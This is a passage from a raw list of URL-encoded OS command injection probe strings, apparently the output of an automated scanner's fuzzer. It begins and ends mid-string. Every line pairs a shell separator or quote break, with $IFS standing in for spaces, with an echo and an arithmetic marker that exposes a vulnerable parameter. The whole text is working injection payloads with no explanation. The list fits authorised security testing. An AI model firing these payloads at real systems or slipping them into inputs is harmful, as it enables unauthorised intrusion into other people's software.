cho$IFSXCUTCE$((23%2B12))$(echo$IFSXCUTCE)XCUTCE%7C\n'%20echo%20UHJUHS$((68%2B93))$(echo%20UHJUHS)UHJUHS%7C\n';echo$IFSKZCKOJ$((33%2B6))$(echo$IFSKZCKOJ)KZCKOJ%7C\n'&echo$IFSKFDAKU$((72%2B93))$(echo$IFSKFDAKU)KFDAKU%7C\n'|echo$IFSNAFNWQ$((47%2B44))$(echo$IFSNAFNWQ)NAFNWQ%7C\n'||echo$IFSTVWVBO$((17%2B96))$(echo$IFSTVWVBO)TVWVBO%7C\n'&&echo$IFSYZQQKL$((73%2B37))$(echo$IFSYZQQKL)YZQQKL%7C\n'%0aecho$IFSMOMQCI$((63%2B38))$(echo$IFSMOMQCI)MOMQCI%7C\n'%3Becho$IFSRTEEYZ$((93%2B75))$(echo$IFSRTEEYZ)RTEEYZ%7C\n'%26echo$IFSZYAICF$((49%2B53))$(echo$IFSZYAICF)ZYAICF%7C\n'%26%26echo$IFSZZSVXZ$((46%2B81))$(echo$IFSZZSVXZ)ZZSVXZ%7C\n'%7Cecho$IFSOIATXB$((46%2B82))$(echo$IFSOIATXB)OIATXB%7C\n'%7C%7Cecho$IFSYOKPWL$((89%2B42))$(echo$IFSYOKPWL)YOKPWL%7C\n\"echo$IFSWKATIV$((60%2B61))$(echo$IFSWKATIV)WKATIV\n\"%20echo%20CWUIKD$((41%2B30))$(echo%20CWUIKD)CWUIKD\n\";echo$IFSJQUSPM$((11%2B2))$(echo$IFSJQUSPM)JQUSPM\n\"&echo$IFSVJUTHP$((96%2B68))$(echo$IFSVJUTHP)VJUTHP\n\"|echo$IFSGCRAHC$((53%2B91))$(echo$IFSGCRAHC)GCRAHC\n\"||echo$IFSCCZBZV$((42%2B82))$(echo$IFSCCZBZV)CCZBZV\n\"&&echo$IFSJOVRVD$((49%2B70))$(echo$IFSJOVRVD)JOVRVD\n\"%0aecho$IFSBJURAW$((1%2B97))$(echo$IFSBJURAW)BJURAW\n\"%3Becho$IFSSTVHDV$((56%2B21))$(echo$IFSSTVHDV)STVHDV\n\"%26echo$IFSKWABXB$((17%2B13))$(echo$IFSKWABXB)KWABXB\n\"%26%26echo$IFSBVWEHE$((52%2B69))$(echo$IFSBVWEHE)BVWEHE\n\"%7Cecho$IFSMHELRN$((54%2B12))$(echo$IFSMHELRN)MHELRN\n\"%7C%7Cecho$IFSJPDBGK$((58%2B46))$(echo$IFSJPDBGK)JPDBGK\n\"echo$IFSHHTXHL$((49%2B36))$(echo$IFSHHTXHL)HHTXHL'\n\"%20echo%20NTZGVY$((19%2B34))$(echo%20NTZGVY)NTZGVY'\n\";echo$IFSWBYLKV$((50%2B27))$(echo$IFSWBYLKV)WBYLKV'\n\"&echo$IFSKWIQTS$((57%2B77))$(echo$IFSKWIQTS)KWIQTS'\n\"|echo$IFSVXVEBJ$((90%2B87))$(echo$IFSVXVEBJ)VXVEBJ'\n\"||echo$IFSUGINJP$((61%2B39))$(echo$IFSUGINJP)UGINJP'\n\"&&echo$IFSCVWJPC$((74%2B17))$(echo$IFSCVWJPC)CVWJPC'\n\"%0aecho$IFSSGWCNL$((73%2B94))$(echo$IFSSGWCNL)SGWCNL'\n\"%3Becho$IFSVRATKU$((73%2B43))$(echo$IFSVRATKU)VRATKU'\n\"%26echo$IFSSDEPLL$((89%2B42))$(echo$IFSSDEPLL)SDEPLL'\n\"%26%26echo$IFSRXEECQ$((1%2B1))$(echo$IFSRXEECQ)RXEECQ'\n\"%7Cecho$IFSZQOGYN$((31%2B70))$(echo$IFSZQOGYN)ZQOGYN'\n\"%7C%7Cecho$IFSRHCEJU$((43%2B33))$(echo$IFSRHCEJU)RHCEJU'\n\"echo$IFSVORHKR$((32%2B24))$(echo$IFSVORHKR)VORHKR\"\n\"%20echo%20WFBQGI$((90%2B90))$(echo%20WFBQGI)WFBQGI\"\n\";echo$IFSGDUPZJ$((65%2B72))$(echo$IFSGDUPZJ)GDUPZJ\"\n\"&echo$IFSYFXZZL$((57%2B13))$(echo$IFSYFXZZL)YFXZZL\"\n\"|echo$IFSAWVDZZ$((61%2B5))$(echo$IFSAWVDZZ)AWVDZZ\"\n\"||echo$IFSXECQXX$((94%2B39))$(echo$IFSXECQXX)XECQXX\"\n\"&&echo$IFSEQTTBQ$((35%2B0))$(echo$IFSEQTTBQ)EQTTBQ\"\n\"%0aecho$IFSPHPXFU$((67%2B50))$(echo$IFSPHPXFU)PHPXFU\"\n\"%3Becho$IFSVICXTN$((37%2B41))$(echo$IFSVICXTN)VICXTN\"\n\"%26echo$IFSWXTKDI$((17%2B67))$(echo$IFSWXTKDI)WXTKDI\"\n\"%26%26echo$IFSRPIHYW$((91%2B37))$(echo$IFSRPIHYW)RPIHYW\"\n\"%7Cecho$IFSUDEEGX$((28%2B85))$(echo$IFSUDEEGX)UDEEGX\"\n\"%7C%7Cecho$IFSZMOHUU$((94%2B69))$(echo$IFSZMOHUU)ZMOHUU\"\n\"echo$IFSONMQKM$((22%2B28))$(echo$IFSONMQKM)ONMQKM\n\"%20echo%20UUXKTB$((57%2B32))$(echo%20UUXKTB)UUXKTB\n\";echo$IFSVYMVPZ$((67%2B64))$(echo$IFSVYMVPZ)VYMVPZ\n\"&echo$IFSGFEHZK$((68%2B85))$(echo$IFSGFEHZK)GFEHZK\n\"|echo$IFSIQCTBX$((54%2B92))$(echo$IFSIQCTBX)IQCTBX\n\"||echo$IFSYDFXUN$((70%2B11))$(echo$IFSYDFXUN)YDFXUN\n\"&&echo$IFSKOPNEP$((92%2B7))$(echo$IFSKOPNEP)KOPNEP\n\"%0aecho$IFSDWMULK$((25%2B34))$(echo$IFSDWMULK)DWMULK\n\"%3Becho$IFSHCBWBH$((0%2B48))$(echo$IFSHCBWBH)HCBWBH\n\"%26echo$IFSPSTQXK$((12%2B96))$(echo$IFSPSTQXK)PSTQXK\n\"%26%26echo$IFSMCAKIV$((64%2B5))$(echo$IFSMCAKIV)MCAKIV\n\"%7Cecho$IFSNOSUCK$((35%2B11))$(echo$IFSNOSUCK)NOSUCK\n\"%7C%7Cecho$IFSCERCHU$((13%2B46))$(echo$IFSCERCHU)CERCHU\n\"echo$IFSETATEF$((80%2B79))$(echo$IFSETATEF)ETATEF//\n\"%20echo%20HWUZPQ$((82%2B33))$(echo%20HWUZPQ)HWUZPQ//\n\";echo$IFSLFGEOY$((22%2B44))$(echo$IFSLFGEOY)LFGEOY//\n\"&echo$IFSZVPWKP$((79%2B81))$(echo$IFSZVPWKP)ZVPWKP//\n\"|echo$IFSXSEOTZ$((78%2B18))$(echo$IFSXSEOTZ)XSEOTZ//\n\"||echo$IFSTCCUHM$((72%2B61))$(echo$IFSTCCUHM)TCCUHM//\n\"&&echo$IFSWPYOYT$((86%2B46))$(echo$IFSWPYOYT)WPYOYT//\n\"%0aecho$IFSEIOLQJ$((69%2B36))$(echo$IFSEIOLQJ)EIOLQJ//\n\"%3Becho$IFSXVUYIQ$((97%2B2))$(echo$IFSXVUYIQ)XVUYIQ//\n\"%26echo$IFSDYXXSS$((94%2B60))$(echo$IFSDYXXSS)DYXXSS//\n\"%26%26echo$IFSYMBKLY$((55%2B32))$(echo$IFSYMBKLY)YMBKLY//\n\"%7Cecho$IFSVHLPZW$((76%2B16))$(echo$IFSVHLPZW)VHLPZW//\n\"%7C%7Cecho$IFSLZOZUN$((8%2B81))$(echo$IFSLZOZUN)LZOZUN//\n\"echo$IFSSYFQAU$((37%2B78))$(echo$IFSSYFQAU)SYFQAU\\\n\"%20echo%20GEWHYE$((65%2B76))$(echo%20GEWHYE)GEWHYE\\\n\";echo$IFSSXCKTB$((75%2B80))$(echo$IFSSXCKTB)SXCKTB\\\n\"&echo$IFSWZXINW$((50%2B11))$(echo$IFSWZXINW)WZXINW\\\n\"|echo$IFSJTANTD$((65%2B98))$(echo$IFSJTANTD)JTANTD\\\n\"||echo$IFSJIAXIU$((62%2B56))$(echo$IFSJIAXIU)JIAXIU\\\n\"&&echo$IFSOONZCK$((32%2B38))$(echo$IFSOONZCK)OONZCK\\\n\"%0aecho$IFSRFLPIG$((74%2B10))$(echo$IFSRFLPIG)RFLPIG\\\n\"%3Becho$IFSHBDBVM$((41%2B30))$(echo$IFSHBDBVM)HBDBVM\\\n\"%26echo$IFSOUNXWG$((62%2B52))$(echo$IFSOUNXWG)OUNXWG\\\n\"%26%26echo$IFSVZSMDF$((4%2B77))$(echo$IFSVZSMDF)VZSMDF\\\n\"%7Cecho$IFSLHIZNN$((66%2B97))$(echo$IFSLHIZNN)LHIZNN\\\n\"%7C%7Cecho$IFSAEEFTZ$((12%2B71))$(echo$IFSAEEFTZ)AEEFTZ\\\n\"echo$IFSGOPZNT$((61%2B76))$(echo$IFSGOPZNT)GOPZNT&\n\"%20echo%20WVCQTP$((98%2B15))$(echo%20WVCQTP)WVCQTP&\n\";echo$IFSZCTRZI$((60%2B12))$(echo$IFSZCTRZI)ZCTRZI&\n\"&echo$IFSNMBAUD$((42%2B5))$(echo$IFSNMBAUD)NMBAUD&\n\"|echo$IFSXDHKIF$((56%2B17))$(echo$IFSXDHKIF)XDHKIF&\n\"||echo$IFSUQNTQG$((30%2B73))$(echo$IFSUQNTQG)UQNTQG&\n\"&&echo$IFSMMQAGA$((77%2B46))$(echo$IFSMMQAGA)MMQAGA&\n\"%0aecho$IFSBPLBPT$((48%2B38))$(echo$IFSBPLBPT)BPLBPT&\n\"%3Becho$IFSERJEHG$((25%2B7))$(echo$IFSERJEHG)ERJEHG&\n\"%26echo$IFSDGFAYX$((17%2B31))$(echo$IFSDGFAYX)DGFAYX&\n\"%26%26echo$IFSTIIXMB$((16%2B84))$(echo$IFSTIIXMB)TIIXMB&\n\"%7Cecho$IFSNXFWKE$((5%2B33))$(echo$IFSNXFWKE)NXFWKE&\n\"%7C%7Cecho$IFSPDWJEU$((34%2B84))$(echo$IFSPDWJEU)PDWJEU&\n\"echo$IFSKQIOUW$((81%2B20))$(echo$IFSKQIOUW)KQIOUW|\n\"%20echo%20GBJIVY$((45%2B22))$(echo%20GBJIVY)GBJIVY|\n\";echo$IFSBIJBTP$((50%2B41))$(echo$IFSBIJBTP)BIJBTP|\n\"&echo$IFSOCYGAQ$((67%2B93))$(echo$IFSOCYGAQ)OCYGAQ|\n\"|echo$IFSLNNHJW$((48%2B51))$(echo$IFSLNNHJW)LNNHJW|\n\"||echo$IFSOOLSUP$((60%2B80))$(echo$IFSOOLSUP)OOLSUP|\n\"&&echo$IFSIKGBUU$((70%2B68))$(echo$IFSIKGBUU)IKGBUU|\n\"%0aecho$IFSYQRSAJ$((55%2B18))$(echo$IFSYQRSAJ)YQRSAJ|\n\"%3Becho$IFSYFIRUN$((89%2B93))$(echo$IFSYFIRUN)YFIRUN|\n\"%26echo$IFSTQUHGT$((51%2B9))$(echo$IFSTQUHGT)TQUHGT|\n\"%26%26echo$IFSMZMLZV$((47%2B52))$(echo$IFSMZMLZV)MZMLZV|\n\"%7Cecho$IFSYTBSTS$((24%2B38))$(echo$IFSYTBSTS)YTBSTS|\n\"%7C%7Cecho$IFSIVBZDH$((37%2B28))$(echo$IFSIVBZDH)IVBZDH|\n\"echo$IFSBYGLDF$((54%2B66))$(echo$IFSBYGLDF)BYGLDF%27\n\"%20echo%20JKBAUZ$((16%2B4))$(echo%20JKBAUZ)JKBAUZ%27\n\";echo$IFSQTBMHG$((67%2B82))$(echo$IFSQTBMHG)QTBMHG%27\n\"&echo$IFSEFVKLM$((89%2B68))$(echo$IFSEFVKLM)EFVKLM%27\n\"|echo$IFSTRBJHF$((51%2B94))$(echo$IFSTRBJHF)TRBJHF%27\n\"||echo$IFSRJOBXI$((9%2B83))$(echo$IFSRJOBXI)RJOBXI%27\n\"&&echo$IFSAVKTLV$((14%2B43))$(echo$IFSAVKTLV)AVKTLV%27\n\"%0aecho$IFSOCKHHF$((36%2B24))$(echo$IFSOCKHHF)OCKHHF%27\n\"%3Becho$IFSVWLOPP$((73%2B16))$(echo$IFSVWLOPP)VWLOPP%27\n\"%26echo$IFSJNESPQ$((88%2B93))$(echo$IFSJNESPQ)JNESPQ%27\n\"%26%26echo$IFSTXPRBJ$((40%2B83))$(echo$IFSTXPRBJ)TXPRBJ%27\n\"%7Cecho$IFSAZYLZZ$((51%2B97))$(echo$IFSAZYLZZ)AZYLZZ%27\n\"%7C%7Cecho$IFSWGMPYH$((66%2B86))$(echo$IFSWGMPYH)WGMPYH%27\n\"echo$IFSWOMGRC$((0%2B46))$(echo$IFSWOMGRC)WOMGRC%22\n\"%20echo%20TCQTDE$((89%2B22))$(echo%20TCQTDE)TCQTDE%22\n\";echo$IFSZRNVWQ$((61%2B2))$(echo$IFSZRNVWQ)ZRNVWQ%22\n\"&echo$IFSFNFBIK$((62%2B22))$(echo$IFSFNFBIK)FNFBIK%22\n\"|echo$IFSIWKOFU$((23%2B55))$(echo$IFSIWKOFU)IWKOFU%22\n\"||echo$IFSVSJPYU$((58%2B8))$(echo$IFSVSJPYU)VSJPYU%22\n\"&&echo$IFSULAPAW$((32%2B88))$(echo$IFSULAPAW)ULAPAW%22\n\"%0aecho$IFSKNQUII$((48%2B98))$(echo$IFSKNQUII)KNQUII%22\n\"%3Becho$IFSGAHIQG$((68%2B82))$(echo$IFSGAHIQG)GAHIQG%22\n\"%26echo$IFSSWZDEK$((23%2B62))$(echo$IFSSWZDEK)SWZDEK%22\n\"%26%26echo$IFSMDMXCZ$((12%2B2))$(echo$IFSMDMXCZ)MDMXCZ%22\n\"%7Cecho$IFSRGIMYI$((25%2B41))$(echo$IFSRGIMYI)RGIMYI%22\n\"%7C%7Cecho$IFSKRLDUJ$((29%2B25))$(echo$IFSKRLDUJ)KRLDUJ%22\n\"echo$IFSZTLCXA$((92%2B39))$(echo$IFSZTLCXA)ZTLCXA%5C%5C\n\"%20echo%20NNFNUJ$((32%2B42))$(echo%20NNFNUJ)NNFNUJ%5C%5C\n\";echo$IFSNOILCW$((35%2B50))$(echo$IFSNOILCW)NOILCW%5C%5C\n\"&echo$IFSIZIKXP$((4%2B56))$(echo$IFSIZIKXP)IZIKXP%5C%5C\n\"|echo$IFSDKKFUX$((53%2B64))$(echo$IFSDKKFUX)DKKFUX%5C%5C\n\"||echo$IFSONWUBF$((85%2B46))$(echo$IFSONWUBF)ONWUBF%5C%5C\n\"&&echo$IFSYBFPVK$((15%2B44))$(echo$IFSYBFPVK)YBFPVK%5C%5C\n\"%0aecho$IFSCOKBAQ$((26%2B6))$(echo$IFSCOKBAQ)COKBAQ%5C%5C\n\"%3Becho$IFSMCZBTD$((19%2B12))$(echo$IFSMCZBTD)MCZBTD%5C%5C\n\"%26echo$IFSFGSFXK$((50%2B67))$(echo$IFSFGSFXK)FGSFXK%5C%5C\n\"%26%26echo$IFSMGZYUX$((69%2B27))$(echo$IFSMGZYUX)MGZYUX%5C%5C\n\"%7Cecho$IFSZOHIKN$((60%2B22))$(echo$IFSZOHIKN)ZOHIKN%5C%5C\n\"%7C%7Cecho$IFSWVBHRV$((70%2B26))$(echo$IFSWVBHRV)WVBHRV%5C%5C\n\"echo$IFSTDYQVX$((81%2B75))$(echo$IFSTDYQVX)TDYQVX%2F%2F\n\"%20echo%20MDJMHU$((0%2B77))$(echo%20MDJMHU)MDJMHU%2F%2F\n\";echo$IFSJMVDKT$((29%2B56))$(echo$IFSJMVDKT)JMVDKT%2F%2F\n\"&echo$IFSHAWFWE$((23%2B63))$(echo$IFSHAWFWE)HAWFWE%2F%2F\n\"|echo$IFSNPJOUL$((60%2B57))$(echo$IFSNPJOUL)NPJOUL%2F%2F\n\"||echo$IFSTJIKIW$((44%2B78))$(echo$IFSTJIKIW)TJIKIW%2F%2F\n\"&&echo$IFSOLYCAK$((57%2B64))$(echo$IFSOLYCAK)OLYCAK%2F%2F\n\"%0aecho$IFSRSKGDD$((67%2B8))$(echo$IFSRSKGDD)RSKGDD%2F%2F\n\"%3Becho$IFSEKSIGH$((71%2B77))$(echo$IFSEKSIGH)EKSIGH%2F%2F\n\"%26echo$IFSEQHFOG$((96%2B31))$(echo$IFSEQHFOG)EQHFOG%2F%2F\n\"%26%26echo$IFSEOCQFN$((57%2B12))$(echo$IFSEOCQFN)EOCQFN%2F%2F\n\"%7Cecho$IFSRCWERA$((82%2B63))$(echo$IFSRCWERA)RCWERA%2F%2F\n\"%7C%7Cecho$IFSUHQPMD$((69%2B4))$(echo$IFSUHQPMD)UHQPMD%2F%2F\n\"echo$IFSITSADJ$((94%2B48))$(echo$IFSITSADJ)ITSADJ%26\n\"%20echo%20FBOBLU$((92%2B42))$(echo%20FBOBLU)FBOBLU%26\n\";echo$IFSAJPXYF$((20%2B50))$(echo$IFSAJPXYF)AJPXYF%26\n\"&echo$IFSUZTQCV$((96%2B22))$(echo$IFSUZTQCV)UZTQCV%26\n\"|echo$IFSIGVJXX$((65%2B58))$(echo$IFSIGVJXX)IGVJXX%26\n\"||echo$IFSMTADSX$((4%2B83))$(echo$IFSMTADSX)MTADSX%26\n\"&&echo$IFSITCFYR$((58%2B9))$(echo$IFSITCFYR)ITCFYR%26\n\"%0aecho$IFSYBTXPF$((15%2B35))$(echo$IFSYBTXPF)YBTXPF%26\n\"%3Becho$IFSVELPDH$((10%2B78))$(echo$IFSVELPDH)VELPDH%26\n\"%26echo$IFSTYVQZP$((31%2B21))$(echo$IFSTYVQZP)TYVQZP%26\n\"%26%26echo$IFSFWROXW$((61%2B7))$(echo$IFSFWROXW)FWROXW%26\n\"%7Cecho$IFSQWRACU$((69%2B14))$(echo$IFSQWRACU)QWRACU%26\n\"%7C%7Cecho$IFSROIMQV$((24%2B28))$(echo$IFSROIMQV)ROIMQV%26\n\"echo$IFSNIKGBF$((93%2B83))$(echo$IFSNIKGBF)NIKGBF%7C\n\"%20echo%20KCONLL$((35%2B55))$(echo%20KCONLL)KCONLL%7C\n\";echo$IFSPUUABZ$((55%2B91))$(echo$IFSPUUABZ)PUUABZ%7C\n\"&echo$IFSHZEEMN$((80%2B42))$(echo$IFSHZEEMN)HZEEMN%7C\n\"|echo$IFSCDYIRQ$((76%2B46))$(echo$IFSCDYIRQ)CDYIRQ%7C\n\"||echo$IFSZGHLKC$((8%2B4))$(echo$IFSZGHLKC)ZGHLKC%7C\n\"&&echo$IFSMNOJXK$((12%2B14))$(echo$IFSMNOJXK)MNOJXK%7C\n\"%0aecho$IFSRZUUUX$((19%2B70))$(echo$IFSRZUUUX)RZUUUX%7C\n\"%3Becho$IFSCHRPGA$((61%2B12))$(echo$IFSCHRPGA)CHRPGA%7C\n\"%26echo$IFSJQOKUV$((22%2B52))$(echo$IFSJQOKUV)JQOKUV%7C\n\"%26%26echo$IFSDQZQSK$((47%2B7))$(echo$IFSDQZQSK)DQZQSK%7C\n\"%7Cecho$IFSFIANHU$((22%2B49))$(echo$IFSFIANHU)FIANHU%7C\n\"%7C%7Cecho$IFSCBHHKP$((85%2B54))$(echo$IFSCBHHKP)CBHHKP%7C\n|echo$IFSLCSZUM$((46%2B15))$(echo$IFSLCSZUM)LCSZUM\n|%20echo%20DLVBOK$((16%2B62))$(echo%20DLVBOK)DLVBOK\n;echo$IFSOQQLKY$((10%2B54))$(echo$IFSOQQLKY)OQQLKY\n&echo$IFSMHSVGL$((14%2B50))$(echo$IFSMHSVGL)MHSVGL\n|echo$IFSNPYJMP$((96%2B63))$(echo$IFSNPYJMP)NPYJMP\n||echo$IFSDZTQUV$((58%2B75))$(echo$IFSDZTQUV)DZTQUV\n&&echo$IFSCOIZAX$((91%2B92))$(echo$IFSCOIZAX)COIZAX\n%0aecho$IFSILXOOR$((23%2B61))$(echo$IFSILXOOR)ILXOOR\n%3Becho$IFSWAGECK$((2%2B54))$(echo$IFSWAGECK)WAGECK\n%26echo$IFSBQOVXE$((69%2B56))$(echo$IFSBQOVXE)BQOVXE\n%26%26echo$IFSESILOB$((37%2B51))$(echo$IFSESILOB)ESILOB\n%7Cecho$IFSUJPLGH$((62%2B6))$(echo$IFSUJPLGH)UJPLGH\n%7C%7Cecho$IFSULGQGO$((89%2B48))$(echo$IFSULGQGO)ULGQGO\necho$IFSLIXPWR$((69%2B26))$(echo$IFSLIXPWR)LIXPWR'\n%20echo%20EMRSDD$((80%2B35))$(echo%20EMRSDD)EMRSDD'\n;echo$IFSOLQCLP$((7%2B9))$(echo$IFSOLQCLP)OLQCLP'\n&echo$IFSUHFGHJ$((52%2B93))$(echo$IFSUHFGHJ)UHFGHJ'\n|echo$IFSTYVVOX$((65%2B44))$(echo$IFSTYVVOX)TYVVOX'\n||echo$IFSCQTNFT$((87%2B14))$(echo$IFSCQTNFT)CQTNFT'\n&&echo$IFSCWFCPC$((35%2B74))$(echo$IFSCWFCPC)CWFCPC'\n%0aecho$IFSBUIOLU$((83%2B61))$(echo$IFSBUIOLU)BUIOLU'\n%3Becho$IFSSUZDDM$((32%2B20))$(echo$IFSSUZDDM)SUZDDM'\n%26echo$IFSLHKOZD$((2%2B55))$(echo$IFSLHKOZD)LHKOZD'\n%26%26echo$IFSWAEWHA$((84%2B51))$(echo$IFSWAEWHA)WAEWHA'\n%7Cecho$IFSFUOWKT$((11%2B83))$(echo$IFSFUOWKT)FUOWKT'\n%7C%7Cecho$IFSDPGMPX$((72%2B63))$(echo$IFSDPGMPX)DPGMPX'\necho$IFSAUYTPO$((72%2B52))$(echo$IFSAUYTPO)AUYTPO\"\n%20echo%20GVYWYM$((61%2B13))$(echo%20GVYWYM)GVYWYM\"\n;echo$IFSSNFHZG$((95%2B62))$(echo$IFSSNFHZG)SNFHZG\"\n&echo$IFSFMZXIF$((30%2B31))$(echo$IFSFMZXIF)FMZXIF\"\n|echo$IFSMNZFPI$((24%2B76))$(echo$IFSMNZFPI)MNZFPI\"\n||echo$IFSKPSLUB$((16%2B33))$(echo$IFSKPSLUB)KPSLUB\"\n&&echo$IFSHHBLVW$((31%2B45))$(echo$IFSHHBLVW)HHBLVW\"\n%0aecho$IFSBRJHDI$((98%2B17))$(echo$IFSBRJHDI)BRJHDI\"\n%3Becho$IFSLIWOMV$((30%2B61))$(echo$IFSLIWOMV)LIWOMV\"\n%26echo$IFSJQVAMD$((56%2B15))$(echo$IFSJQVAMD)JQVAMD\"\n%26%26echo$IFSVHKGMR$((26%2B28))$(echo$IFSVHKGMR)VHKGMR\"\n%7Cecho$IFSJJIMGS$((39%2B63))$(echo$IFSJJIMGS)JJIMGS\"\n%7C%7Cecho$IFSLSGJRQ$((28%2B34))$(echo$IFSLSGJRQ)LSGJRQ\"\necho$IFSSWOEAI$((89%2B70))$(echo$IFSSWOEAI)SWOEAI\n%20echo%20WKKPJF$((94%2B30))$(echo%20WKKPJF)WKKPJF\n;echo$IFSWUQPLA$((73%2B27))$(echo$IFSWUQPLA)WUQPLA\n&echo$IFSBXBVOS$((78%2B10))$(echo$IFSBXBVOS)BXBVOS\n|echo$IFSLXLUOD$((68%2B51))$(echo$IFSLXLUOD)LXLUOD\n||echo$IFSDPTPFZ$((37%2B20))$(echo$IFSDPTPFZ)DPTPFZ\n&&echo$IFSRIRRVG$((43%2B47))$(echo$IFSRIRRVG)RIRRVG\n%0aecho$IFSHSVHKA$((85%2B77))$(echo$IFSHSVHKA)HSVHKA\n%3Becho$IFSCIDNHM$((30%2B88))$(echo$IFSCIDNHM)CIDNHM\n%26echo$IFSTYUNYQ$((1%2B27))$(echo$IFSTYUNYQ)TYUNYQ\n%26%26echo$IFSQLXSPL$((22%2B2))$(echo$IFSQLXSPL)QLXSPL\n%7Cecho$IFSTXNBJZ$((0%2B67))$(echo$IFSTXNBJZ)TXNBJZ\n%7C%7Cecho$IFSGHEBEC$((72%2B52))$(echo$IFSGHEBEC)GHEBEC\necho$IFSUMOYPF$((66%2B31))$(echo$IFSUMOYPF)UMOYPF//\n%20echo%20VRYUIC$((62%2B65))$(echo%20VRYUIC)VRYUIC//\n;echo$IFSEMLBQR$((31%2B56))$(echo$IFSEMLBQR)EMLBQR//\n&echo$IFSOCUZHX$((85%2B82))$(echo$IFSOCUZHX)OCUZHX//\n|echo$IFSEZAPVW$((95%2B18))$(echo$IFSEZAPVW)EZAPVW//\n||echo$IFSIWAFLA$((17%2B83))$(echo$IFSIWAFLA)IWAFLA//\n&&echo$IFSAKRGLM$((80%2B60))$(echo$IFSAKRGLM)AKRGLM//\n%0aecho$IFSOIOFXV$((43%2B15))$(echo$IFSOIOFXV)OIOFXV//\n%3Becho$IFSNGWBSU$((48%2B3))$(echo$IFSNGWBSU)NGWBSU//\n%26echo$IFSGSBMEB$((40%2B21))$(echo$IFSGSBMEB)GSBMEB//\n%26%26echo$IFSDTKGOW$((36%2B42))$(echo$IFSDTKGOW)DTKGOW//\n%7Cecho$IFSOHOTGG$((99%2B58))$(echo$IFSOHOTGG)OHOTGG//\n%7C%7Cecho$IFSIODRIH$((80%2B87))$(echo$IFSIODRIH)IODRIH//\necho$IFSUPLBDT$((24%2B49))$(echo$IFSUPLBDT)UPLBDT\\\n%20echo%20TXNMBR$((39%2B88))$(echo%20TXNMBR)TXNMBR\\\n;echo$IFSUAHSRY$((0%2B55))$(echo$IFSUAHSRY)UAHSRY\\\n&echo$IFSYVPJGQ$((92%2B10))$(echo$IFSYVPJGQ)YVPJGQ\\\n|echo$IFSEBBOEZ$((37%2B91))$(echo$IFSEBBOEZ)EBBOEZ\\\n||echo$IFSVSCFSB$((3%2B2))$(echo$IFSVSCFSB)VSCFSB\\\n&&echo$IFSQXNYWT$((50%2B82))$(echo$IFSQXNYWT)QXNYWT\\\n%0aecho$IFSLBYCDI$((79%2B92))$(echo$IFSLBYCDI)LBYCDI\\\n%3Becho$IFSDXMRQT$((52%2B34))$(echo$IFSDXMRQT)DXMRQT\\\n%26echo$IFSJREIYL$((10%2B95))$(echo$IFSJREIYL)JREIYL\\\n%26%26echo$IFSHCFVYN$((99%2B28))$(echo$IFSHCFVYN)HCFVYN\\\n%7Cecho$IFSSUHYSU$((21%2B53))$(echo$IFSSUHYSU)SUHYSU\\\n%7C%7Cecho$IFSALLVVO$((50%2B22))$(echo$IFSALLVVO)ALLVVO\\\necho$IFSLGTLKK$((65%2B27))$(echo$IFSLGTLKK)LGTLKK&\n%20echo%20GBSQUY$((50%2B66))$(echo%20GBSQUY)GBSQUY&\n;echo$IFSZQHRWI$((42%2B35))$(echo$IFSZQHRWI)ZQHRWI&\n&echo$IFSZJOTOV$((13%2B82))$(echo$IFSZJOTOV)ZJOTOV&\n|echo$IFSTNAENV$((39%2B94))$(echo$IFSTNAENV)TNAENV&\n||echo$IFSJVYMEK$((76%2B35))$(echo$IFSJVYMEK)JVYMEK&\n&&echo$IFSQDJECI$((28%2B96))$(echo$IFSQDJECI)QDJECI&\n%0aecho$IFSHJRQCU$((0%2B63))$(echo$IFSHJRQCU)HJRQCU&\n%3Becho$IFSIOLXIC$((8%2B16))$(echo$IFSIOLXIC)IOLXIC&\n%26echo$IFSSCHCVM$((93%2B31))$(echo$IFSSCHCVM)SCHCVM&\n%26%26echo$IFSBGVLEQ$((60%2B59))$(echo$IFSBGVLEQ)BGVLEQ&\n%7Cecho$IFSEDDVWA$((82%2B98))$(echo$IFSEDDVWA)EDDVWA&\n%7C%7Cecho$IFSKNLSBT$((88%2B60))$(echo$IFSKNLSBT)KNLSBT&\necho$IFSQGZFHM$((40%2B15))$(echo$IFSQGZFHM)QGZFHM|\n%20echo%20EIFXCG$((20%2B68))$(echo%20EIFXCG)EIFXCG|\n;echo$IFSCKYHAJ$((39%2B53))$(echo$IFSCKYHAJ)CKYHAJ|\n&echo$IFSOUBRDR$((47%2B29))$(echo$IFSOUBRDR)OUBRDR|\n|echo$IFSUFZURL$((39%2B84))$(echo$IFSUFZURL)UFZURL|\n||echo$IFSWOBQDK$((42%2B28))$(echo$IFSWOBQDK)WOBQDK|\n&&echo$IFSSUJVLB$((59%2B86))$(echo$IFSSUJVLB)SUJVLB|\n%0aecho$IFSSNIVPI$((9%2B71))$(echo$IFSSNIVPI)SNIVPI|\n%3Becho$IFSMKSRXM$((30%2B19))$(echo$IFSMKSRXM)MKSRXM|\n%26echo$IFSIRVZDV$((73%2B9))$(echo$IFSIRVZDV)IRVZDV|\n%26%26echo$IFSWBIFGE$((67%2B32))$(echo$IFSWBIFGE)WBIFGE|\n%7Cecho$IFSREQHRF$((82%2B40))$(echo$IFSREQHRF)REQHRF|\n%7C%7Cecho$IFSEJZUFX$((9%2B88))$(echo$IFSEJZUFX)EJZUFX|\necho$IFSRHERRD$((18%2B82))$(echo$IFSRHERRD)RHERRD%27\n%20echo%20HXCOZT$((48%2B89))$(echo%20HXCOZT)HXCOZT%27\n;echo$IFSSYZLKW$((13%2B55))$(echo$IFSSYZLKW)SYZLKW%27\n&echo$IFSWBYLPB$((80%2B54))$(echo$IFSWBYLPB)WBYLPB%27\n|echo$IFSGFLOUA$((7%2B71))$(echo$IFSGFLOUA)GFLOUA%27\n||echo$IFSBCZPXJ$((39%2B35))$(echo$IFSBCZPXJ)BCZPXJ%27\n&&echo$IFSGWXAGT$((52%2B45))$(echo$IFSGWXAGT)GWXAGT%27\n%0aecho$IFSRZZKHJ$((26%2B66))$(echo$IFSRZZKHJ)RZZKHJ%27\n%3Becho$IFSIEOSEZ$((86%2B74))$(echo$IFSIEOSEZ)IEOSEZ%27\n%26echo$IFSRGSNFF$((14%2B60))$(echo$IFSRGSNFF)RGSNFF%27\n%26%26echo$IFSNSUHXN$((87%2B12))$(echo$IFSNSUHXN)NSUHXN%27\n%7Cecho$IFSVJNFLD$((16%2B2))$(echo$IFSVJNFLD)VJNFLD%27\n%7C%7Cecho$IFSWJYCOX$((21%2B64))$(echo$IFSWJYCOX)WJYCOX%27\necho$IFSQYFURG$((23%2B53))$(echo$IFSQYFURG)QYFURG%22\n%20e